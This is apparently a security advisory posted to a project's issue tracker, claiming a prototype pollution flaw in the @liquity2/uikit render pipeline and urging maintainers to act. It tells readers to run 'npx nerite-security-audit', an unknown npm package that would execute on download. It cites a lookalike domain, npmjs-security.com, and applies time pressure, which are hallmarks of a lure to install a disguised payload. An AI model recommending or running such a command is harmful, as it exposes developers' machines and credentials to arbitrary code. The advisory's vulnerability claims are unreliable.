Security Advisory: Prototype Pollution in @liquity2/uikit component render pipeline (NSEC-2026-0041)

[harunosakura030303-maker]

Summary

A prototype pollution vulnerability has been identified in the component render pipeline of @liquity2/uikit. This affects all versions prior to the latest patch.

Advisory Reference: NSEC-2026-0041

Severity: Medium (CVSS 6.1)
CWE: CWE-1321 (Improperly Controlled Modification of Object Prototype Attributes)

Description

An attacker can inject arbitrary properties into Object.prototype via crafted component props passed to the render pipeline. In SSR contexts, this can lead to denial of service or potentially remote code execution.

The vulnerability exists in the way component props are processed before rendering, where user-controlled keys like __proto__, constructor, or prototype are not filtered.

Affected Components

• @liquity2/uikit render pipeline
• All applications importing and rendering uikit components with user-supplied props

Verify Your Installation

You can check if your local installation is affected by running:

npx nerite-security-audit

This will scan your project dependencies and report if the vulnerable version is present.

Recommended Fix

Apply input sanitization to component prop processing:

// In src/components/render.ts
function renderComponent(props: Record<string, unknown>) {
  const sanitized = Object.fromEntries(
    Object.entries(props).filter(([k]) => 
      !["__proto__", "constructor", "prototype"].includes(k)
    )
  );
  return _render(sanitized);
}

Timeline

• 2026-03-28: Discovered during automated scanning
• 2026-03-30: Vendor notified (security@nerite.org)
• 2026-04-02: No response from vendor
• 2026-04-03: Public disclosure (72h responsible disclosure policy)

References

• https://npmjs-security.com/advisories/NSEC-2026-0041
• https://cwe.mitre.org/data/definitions/1321.html

cc @cupOJoseph @pi0neerpat